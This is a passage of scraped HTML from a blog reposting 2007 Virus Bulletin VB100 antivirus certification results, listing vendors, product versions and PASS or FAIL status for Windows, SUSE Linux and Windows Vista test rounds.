-moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE50">iolo</a><br /><i>Product name</i>: iolo AntiVirus 1.1.9</td> </tr></tbody></table> <h3>K7 Computing</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE51">K7 Computing</a><br /><i>Product name</i>: K7 Total Security 2006</td> </tr></tbody></table> <h3>Kaspersky</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE15">Kaspersky</a><br /><i>Product name</i>: Kaspersky Anti-Virus 6.0.2.621</td> </tr></tbody></table> <h3>McAfee</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE2">McAfee</a><br /><i>Product name</i>: McAfee VirusScan Enterprise v.8.5i</td> </tr></tbody></table> <h3>Microsoft Forefront</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE52">Microsoft Forefront</a><br /><i>Product name</i>: Microsoft Forefront Client Security 1.5.1937</td> </tr></tbody></table> <h3>Microsoft OneCare</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE41">Microsoft OneCare</a><br /><i>Product name</i>: Microsoft Windows Live OneCare 1.5.1890.35</td> </tr></tbody></table> <h3>MicroWorld</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE33">MicroWorld</a><br /><i>Product name</i>: Microworld eScan Internet Security for Windows 9.0.714.1</td> </tr></tbody></table> <h3>Norman</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE18">Norman</a><br /><i>Product name</i>: Norman Virus Control 5.90</td> </tr></tbody></table> <h3>NWI</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE34">NWI</a><br /><i>Product name</i>: NWI VirusChaser 5.0a</td> </tr></tbody></table> <h3>PC Tools AntiVirus</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE53">PC Tools AntiVirus</a><br /><i>Product name</i>: PC Tools Antivirus 3.1.1.6</td> </tr></tbody></table> <h3>PC Tools Spyware Doctor</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE54">PC Tools Spyware Doctor</a><br /><i>Product name</i>: PC Tools Spyware Doctor v.5.0.0.182</td> </tr></tbody></table> <h3>Proland Software</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE28">Proland Software</a><br /><i>Product name</i>: Proland Protector Plus 2007</td> </tr></tbody></table> <h3>BitDefender (SOFTWIN)</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE11">BitDefender (SOFTWIN)</a><br /><i>Product name</i>: Softwin Bitdefender Antivirus Plus v.10</td> </tr></tbody></table> <h3>Sophos</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE1">Sophos</a><br /><i>Product name</i>: Sophos Anti-Virus 6.54 R2</td> </tr></tbody></table> <h3>Symantec</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE4">Symantec</a><br /><i>Product name</i>: Symantec AntiVirus 1.0.0.359</td> </tr></tbody></table> <h3>Trend Micro</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE3">Trend Micro</a><br /><i>Product name</i>: Trend Micro PC-cillin Internet Security 2007 15.30.1151</td> </tr></tbody></table> <h3>VirusBuster</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE20">VirusBuster</a><br /><i>Product name</i>: VirusBuster VirusBuster Professional 2006 v.5.2</td> </tr></tbody></table> <h3>Webroot</h3> <table class="layout"><tbody><tr><td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE55">Webroot</a><br /><i>Product name</i>: Webroot Spy Sweeper with AntiVirus 5.5</td></tr></tbody></table><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-4961425071967572586?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-31469114368243010922007-08-22T03:18:00.002-07:002007-08-22T03:19:25.995-07:00VB100 - SUSE Linux - April 2007<h3>Alwil</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE9">Alwil</a><br /><i>Product name</i>: Alwil avast! 4 v. 3.0.1</td> </tr></tbody></table> <h3>Avira</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE37">Avira</a><br /><i>Product name</i>: Avira AntiVir 2.1.9-37</td> </tr></tbody></table> <h3>CA eTrust</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE39">CA eTrust</a><br /><i>Product name</i>: CA eTrust r.8.1.5310</td> </tr></tbody></table> <h3>CAT QuickHeal</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE29">CAT QuickHeal</a><br /><i>Product name</i>: CAT Quick Heal 2007 v.9</td> </tr></tbody></table> <h3>Doctor Web</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE5">Doctor Web</a><br /><i>Product name</i>: Doctor Web Dr.Web 4.33</td> </tr></tbody></table> <h3>Eset</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE14">Eset</a><br /><i>Product name</i>: ESET Nod32 for Linux Server 2.70.4</td> </tr></tbody></table> <h3>FRISK</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE8">FRISK</a><br /><i>Product name</i>: Frisk F-Prot Anti-Virus 6.2.0</td> </tr></tbody></table> <h3>F-Secure</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE23">F-Secure</a><br /><i>Product name</i>: F-Secure Linux Server Security 5.50</td> </tr></tbody></table> <h3>Grisoft</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE10">Grisoft</a><br /><i>Product name</i>: Grisoft AVG 7.5</td> </tr></tbody></table> <h3>Kaspersky</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE15">Kaspersky</a><br /><i>Product name</i>: Kaspersky Anti-Virus for Linux 5.5.9</td> </tr></tbody></table> <h3>McAfee</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE2">McAfee</a><br /><i>Product name</i>: McAfee LinuxShield 1.4.0</td> </tr></tbody></table> <h3>MicroWorld</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE33">MicroWorld</a><br /><i>Product name</i>: Microworld eScan AntiVirus for Linux File Servers 2.0.11</td> </tr></tbody></table> <h3>Norman</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE18">Norman</a><br /><i>Product name</i>: Norman Virus Control 5.70.01</td> </tr></tbody></table> <h3>Sophos</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE1">Sophos</a><br /><i>Product name</i>: Sophos Anti-Virus for Linux 5.70.1</td> </tr></tbody></table> <h3>Symantec</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE4">Symantec</a><br /><i>Product name</i>: Symantec AntiVirus 1.0.1.66</td> </tr></tbody></table> <h3>VirusBuster</h3> <table class="layout"><tbody><tr><td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE20">VirusBuster</a><br /><i>Product name</i>: VirusBuster VirusBuster Scanner 1.3.4/SambaShield 1.1.3-2 for Linux</td></tr></tbody></table><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-3146911436824301092?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-28684165902490369432007-08-22T03:18:00.001-07:002007-08-22T03:19:55.003-07:00VB100 - Windows Vista - February 2007<h3>Alwil</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE9">Alwil</a><br /><i>Product name</i>: Alwil avast! Professional Edition 4.7</td> </tr></tbody></table> <h3>CA Home</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE46">CA Home</a><br /><i>Product name</i>: CA Anti-Virus 8.2.013</td> </tr></tbody></table> <h3>CA eTrust</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE39">CA eTrust</a><br /><i>Product name</i>: CA eTrust Integrated Threat Management Suite r.8.1</td> </tr></tbody></table> <h3>CAT QuickHeal</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE29">CAT QuickHeal</a><br /><i>Product name</i>: CAT Quick Heal AntiVirus Plus 2007 version 9.00</td> </tr></tbody></table> <h3>Eset</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE14">Eset</a><br /><i>Product name</i>: ESET NOD32 antivirus system 2.7</td> </tr></tbody></table> <h3>Fortinet</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE17">Fortinet</a><br /><i>Product name</i>: Fortinet FortiClient 3.0.379</td> </tr></tbody></table> <h3>F-Secure</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE23">F-Secure</a><br /><i>Product name</i>: F-Secure Anti-Virus for Vista 2007</td> </tr></tbody></table> <h3>GDATA</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE24">GDATA</a><br /><i>Product name</i>: G DATA AntiVirusKit 2007 v. 17.0.6353</td> </tr></tbody></table> <h3>Grisoft</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE10">Grisoft</a><br /><i>Product name</i>: Grisoft AVG 7.5.433</td> </tr></tbody></table> <h3>Kaspersky</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE15">Kaspersky</a><br /><i>Product name</i>: Kaspersky Anti-Virus 6.0.2.546</td> </tr></tbody></table> <h3>McAfee</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE2">McAfee</a><br /><i>Product name</i>: McAfee VirusScan Enterprise version 8.1i</td> </tr></tbody></table> <h3>Microsoft OneCare</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE41">Microsoft OneCare</a><br /><i>Product name</i>: Microsoft Windows Live OneCare 1.5</td> </tr></tbody></table> <h3>Norman</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE18">Norman</a><br /><i>Product name</i>: Norman Virus Control v.5.90</td> </tr></tbody></table> <h3>Sophos</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE1">Sophos</a><br /><i>Product name</i>: Sophos Anti-Virus 6.5.1</td> 